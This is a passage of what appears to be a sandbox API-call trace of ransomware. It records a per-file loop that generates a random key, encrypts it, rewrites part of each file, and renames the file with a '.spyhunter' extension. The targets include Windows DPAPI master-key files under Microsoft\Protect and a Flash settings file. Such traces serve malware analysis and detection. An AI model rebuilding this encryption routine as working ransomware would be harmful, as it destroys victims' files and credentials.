(lpFirst="621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d", lpSrch=".txt") returned 0x0 [0140.604] GetProcessHeap () returned 0x2c0000 [0140.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.604] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf0b4*=0x1d4, lpOverlapped=0x0) returned 1 [0140.605] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.605] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf0b4*=0x1d4, lpOverlapped=0x0) returned 1 [0140.605] GetProcessHeap () returned 0x2c0000 [0140.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.605] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.606] WriteFile (in: hFile=0x178, lpBuffer=0x25cf0f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf0f4*, lpNumberOfBytesWritten=0x25cf0b4*=0x4, lpOverlapped=0x0) returned 1 [0140.606] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0b4*=0x30, lpOverlapped=0x0) returned 1 [0140.606] CloseHandle (hObject=0x178) returned 1 [0140.606] GetProcessHeap () returned 0x2c0000 [0140.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.607] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d.spyhunter") returned 161 [0140.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d.spyhunter")) returned 1 [0140.608] GetProcessHeap () returned 0x2c0000 [0140.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.608] GetProcessHeap () returned 0x2c0000 [0140.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.608] GetProcessHeap () returned 0x2c0000 [0140.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2688 | out: hHeap=0x2c0000) returned 1 [0140.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0f8 | out: pbBuffer=0x25cf0f8) returned 1 [0140.608] GetProcessHeap () returned 0x2c0000 [0140.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0f0*=0x30) returned 1 [0140.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0140.613] StrStrW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".txt") returned 0x0 [0140.613] GetProcessHeap () returned 0x2c0000 [0140.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.614] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf0b4*=0x1d4, lpOverlapped=0x0) returned 1 [0140.615] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.615] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf0b4*=0x1d4, lpOverlapped=0x0) returned 1 [0140.615] GetProcessHeap () returned 0x2c0000 [0140.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.615] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.615] WriteFile (in: hFile=0x178, lpBuffer=0x25cf0f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf0f4*, lpNumberOfBytesWritten=0x25cf0b4*=0x4, lpOverlapped=0x0) returned 1 [0140.615] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0b4*=0x30, lpOverlapped=0x0) returned 1 [0140.615] CloseHandle (hObject=0x178) returned 1 [0140.615] GetProcessHeap () returned 0x2c0000 [0140.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.616] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.spyhunter") returned 161 [0140.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.spyhunter")) returned 1 [0140.617] GetProcessHeap () returned 0x2c0000 [0140.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.617] GetProcessHeap () returned 0x2c0000 [0140.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.617] GetProcessHeap () returned 0x2c0000 [0140.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2510 | out: hHeap=0x2c0000) returned 1 [0140.617] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0f0 | out: pbBuffer=0x25cf0f0) returned 1 [0140.617] GetProcessHeap () returned 0x2c0000 [0140.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.617] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0e8*=0x30) returned 1 [0140.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0140.618] StrStrW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".txt") returned 0x0 [0140.618] GetProcessHeap () returned 0x2c0000 [0140.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.618] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf0ac*=0x1d4, lpOverlapped=0x0) returned 1 [0140.619] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.619] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf0ac*=0x1d4, lpOverlapped=0x0) returned 1 [0140.619] GetProcessHeap () returned 0x2c0000 [0140.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.619] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.619] WriteFile (in: hFile=0x178, lpBuffer=0x25cf0ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf0ec*, lpNumberOfBytesWritten=0x25cf0ac*=0x4, lpOverlapped=0x0) returned 1 [0140.619] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0ac*=0x30, lpOverlapped=0x0) returned 1 [0140.620] CloseHandle (hObject=0x178) returned 1 [0140.620] GetProcessHeap () returned 0x2c0000 [0140.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.620] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.spyhunter") returned 161 [0140.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.spyhunter")) returned 1 [0140.621] GetProcessHeap () returned 0x2c0000 [0140.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.621] GetProcessHeap () returned 0x2c0000 [0140.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.621] GetProcessHeap () returned 0x2c0000 [0140.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2398 | out: hHeap=0x2c0000) returned 1 [0140.621] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0f0 | out: pbBuffer=0x25cf0f0) returned 1 [0140.621] GetProcessHeap () returned 0x2c0000 [0140.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.622] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0e8*=0x30) returned 1 [0140.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.669] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0140.669] StrStrW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".txt") returned 0x0 [0140.669] GetProcessHeap () returned 0x2c0000 [0140.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.669] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf0ac*=0x1d4, lpOverlapped=0x0) returned 1 [0140.669] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.670] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf0ac*=0x1d4, lpOverlapped=0x0) returned 1 [0140.670] GetProcessHeap () returned 0x2c0000 [0140.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.670] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.670] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf0ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf0ec*, lpNumberOfBytesWritten=0x25cf0ac*=0x4, lpOverlapped=0x0) returned 1 [0140.670] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0ac*=0x30, lpOverlapped=0x0) returned 1 [0140.670] CloseHandle (hObject=0xf0) returned 1 [0140.670] GetProcessHeap () returned 0x2c0000 [0140.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.670] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.spyhunter") returned 161 [0140.670] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.spyhunter")) returned 1 [0140.671] GetProcessHeap () returned 0x2c0000 [0140.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.671] GetProcessHeap () returned 0x2c0000 [0140.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.671] GetProcessHeap () returned 0x2c0000 [0140.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2220 | out: hHeap=0x2c0000) returned 1 [0140.671] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0e8 | out: pbBuffer=0x25cf0e8) returned 1 [0140.671] GetProcessHeap () returned 0x2c0000 [0140.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.671] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0e0*=0x30) returned 1 [0140.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.671] GetProcessHeap () returned 0x2c0000 [0140.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.672] GetProcessHeap () returned 0x2c0000 [0140.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb52d8 | out: hHeap=0x2c0000) returned 1 [0140.672] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0e8 | out: pbBuffer=0x25cf0e8) returned 1 [0140.672] GetProcessHeap () returned 0x2c0000 [0140.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.672] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0e0*=0x30) returned 1 [0140.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.672] GetProcessHeap () returned 0x2c0000 [0140.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.672] GetProcessHeap () returned 0x2c0000 [0140.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb51f8 | out: hHeap=0x2c0000) returned 1 [0140.853] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0c8 | out: pbBuffer=0x25cf0c8) returned 1 [0140.853] GetProcessHeap () returned 0x2c0000 [0140.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.853] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0c0*=0x30) returned 1 [0140.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.854] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0140.854] StrStrW (lpFirst="settings.sol", lpSrch=".txt") returned 0x0 [0140.854] GetProcessHeap () returned 0x2c0000 [0140.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.854] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf084, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf084*=0x1d6, lpOverlapped=0x0) returned 1 [0140.855] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffe2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.855] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1d6, lpNumberOfBytesWritten=0x25cf084, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf084*=0x1d6, lpOverlapped=0x0) returned 1 [0140.855] GetProcessHeap () returned 0x2c0000 [0140.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.855] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.855] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf0c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf084, lpOverlapped=0x0 | out: lpBuffer=0x25cf0c4*, lpNumberOfBytesWritten=0x25cf084*=0x4, lpOverlapped=0x0) returned 1 [0140.856] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf084, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf084*=0x30, lpOverlapped=0x0) returned 1 [0140.856] CloseHandle (hObject=0xf0) returned 1 [0140.856] GetProcessHeap () returned 0x2c0000 [0140.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.856] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.spyhunter") returned 135 [0140.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.spyhunter")) returned 1 [0140.857] GetProcessHeap () returned 0x2c0000 [0140.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.857] GetProcessHeap () returned 0x2c0000 [0140.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.857] GetProcessHeap () returned 0x2c0000 [0140.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf550 | out: hHeap=0x2c0000) returned 1 [0140.859] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0b8 | out: pbBuffer=0x25cf0b8) returned 1 [0140.859] GetProcessHeap () returned 0x2c0000 [0140.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.859] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, 